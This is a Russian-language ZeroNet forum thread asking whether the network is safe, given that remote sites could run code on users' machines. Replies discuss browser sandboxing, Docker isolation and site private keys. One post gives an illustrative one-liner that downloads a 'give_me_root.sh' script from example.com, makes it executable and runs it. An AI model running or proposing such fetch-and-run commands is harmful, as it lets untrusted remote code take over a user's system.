? Редактирование: Post:21.body Сохранить Удалить Закрыть
Инициализация...

Самое новое

СледитьСлежу
+ Создать новую тему
FAQ | En-Zer0Talk | Блоги о разработке: gomzik'a / kostaNew
Загрузка...

Title

Body
^1 ^2 added ━ автор user_name
More topics

Main ZeroNet news How did you find ZeroNet?

Follow in NewsfeedFollowing

Безопасен ли ZeroNET?

учитывая, что кем-то написанный код исполняется на чужой, удаленной машине?

^2 ^3 linxon отправил on Oct 10, 2016
Please sign innew comment
Войти как...
Отправить
You are running out of your allowed space, please contact the site's admin at unknown to raise your limit.
user_nameadded ^1 ^2
Ответить
Body
tster2xon May 19, 2019 ^1 ^2
Ответить

при грамотном использовании да есть поддержка шифрования трафика и его рандомизация

bromon Oct 30, 2016 ^1 ^2
Ответить

dan2017: А какой смысл заходить сюда через локальный прокси (python). Оператор или провайдер увидит реальный адрес(IP, URL), по которому питоновский прокси перенаправляет пользователя на этот сайт?

а зачем перенаправлять, если все хостится локально?

dan2017on Oct 29, 2016 ^1 ^2
Ответить

А какой смысл заходить сюда через локальный прокси (python). Оператор или провайдер увидит реальный адрес(IP, URL), по которому питоновский прокси перенаправляет пользователя на этот сайт?

dan2017on Oct 29, 2016 ^1 ^2
Ответить

<Регулярно всплывают те или иные уязвимости, через которые всякие левосайты без подтверждения со стороны пользователя что-нибудь ставят в систему :) Сейчас, правда, реже стало, чем лет 5-10 назад, но иногда всё ещё попадается. Как правило винда, конечно.>

Интересно.

linxonon Oct 16, 2016 ^1 ^2
Ответить

trava: На ресурсе http://127.0.0.1:43110/zerosecurity.bit/ есть достаточно интересная информация на тему безопасности и анонимности ZeroNet.

спасибо!

travaon Oct 16, 2016 ^3 ^4
Ответить

На ресурсе http://127.0.0.1:43110/zerosecurity.bit/ есть достаточно интересная информация на тему безопасности и анонимности ZeroNet.

zerroon Oct 11, 2016 ^2 ^3
Ответить

Хороший вариант это запускать ZeroNet в изолированном окружении, например в Docker, давая доступ только к папке ./data и сети.

vvvolfon Oct 11, 2016 ^1 ^2
Ответить

Конечно, поскольку установленный на компьютере ZeroNet предоставляет API, с которым работают зайты, то есть потенциальная возможность следующего сценария: зайт может осуществить такой вызов функций API, благодаря которому движок ZeroNet выполнит вредоносные действия (что то изменит, сотрёт или украдёт). Я не знаю, как это сделать, и возможно ли. Но пока обратное не доказано, такую вероятность нельзя отрицать.

Браузеры уже хорошо обкатаны, как уже написал balancer73, но опасность всегда сохраняется. А сам движок ZeroNet вешь сырая и динамичная, поэтому потенциально более опасная.

balancer73on Oct 10, 2016 ^1 ^2
Ответить

shift: @linxon Если вы зайдете на сфеерический сайт с вирусом.exe - да он его скачает, но запускать естественно не станет

Регулярно всплывают те или иные уязвимости, через которые всякие левосайты без подтверждения со стороны пользователя что-нибудь ставят в систему :) Сейчас, правда, реже стало, чем лет 5-10 назад, но иногда всё ещё попадается. Как правило винда, конечно.

balancer73on Oct 10, 2016 ^1 ^2
Ответить

voland: Хм, а где такой режим находится?

Например, можно выдернуть сетевой кабель из гнезда или выключить Wi-Fi :)

linxonon Oct 10, 2016 ^1 ^2
Ответить

shift: @linxon Единственный код который может исполнить ZeroNet - JavaScript и тот - в браузере, так, что не стоит переживать что ZeroNet что-то вам установит. Если вы зайдете на сфеерический сайт с вирусом.exe - да он его скачает, но запускать естественно не станет

спасибо! успокоили...

shifton Oct 10, 2016 ^1 ^2
Ответить

@linxon Единственный код который может исполнить ZeroNet - JavaScript и тот - в браузере, так, что не стоит переживать что ZeroNet что-то вам установит. Если вы зайдете на сфеерический сайт с вирусом.exe - да он его скачает, но запускать естественно не станет

zalexon Oct 10, 2016 ^1 ^2
Ответить

voland: там, есть еще и кнопка: "мой сайт"... Так оно глядишь и сайт может стать чужим, или еще как-то

"Слышишь звон, да не знаешь где он." Сайт станет чужим, если настоящий его владелец передаст приватный ключ. Нет ключа - на вкладке "This is my site" ничего не сделаешь.

zalexon Oct 10, 2016 ^3 ^4
Ответить

@linxon, цитирую @nofish (создателя ZeroNet):

ZeroNet does not run any logic (script) that has been downloaded from the network, so sites has the same permission as any website you visit over the Internet.

linxonon Oct 10, 2016 ^1 ^2
Ответить

voland: там, есть еще и кнопка: "мой сайт"... Так оно глядишь и сайт может стать чужим, или еще как-то

Имею ввиду вирусы, которые могут быть установленны на каком-нибудь сайте злоумышленником. Что, если жертва скачает на машину клиентскую часть сайта с вредоносным кодом, который обработает серверная часть.

какая-нибудь строка, вроде:
wget ftp://example.com/files/give_me_root.sh && chmod 0777 give_me_root.sh && ./give_me_root.sh

:)

bromon Oct 10, 2016 ^1 ^2
Ответить

voland: там, есть еще и кнопка: "мой сайт"... Так оно глядишь и сайт может стать чужим, или еще как-то

тут речь о том, что ZeroNet всегда находится на твоей машине и доступ к ресурсам ты можешь получить и без интернет соединения ( если ты их уже выкачал)

volandon Oct 10, 2016 ^1 ^2
Ответить

там, есть еще и кнопка: "мой сайт"... Так оно глядишь и сайт может стать чужим, или еще как-то

volandon Oct 10, 2016 ^1 ^2
Ответить

balancer73: Кстати, в ZeroNet возможен параноидальный режим. Можно запускать браузер для работы с сетью только предварительно отключив внешний Интернет :)

Хм, а где такой режим находится?

balancer73on Oct 10, 2016 ^1 ^2
Ответить

Кстати, в ZeroNet возможен параноидальный режим. Можно запускать браузер для работы с сетью только предварительно отключив внешний Интернет :)

This page is a snapshot of ZeroNet. Start your own ZeroNet for complete experience. Learn More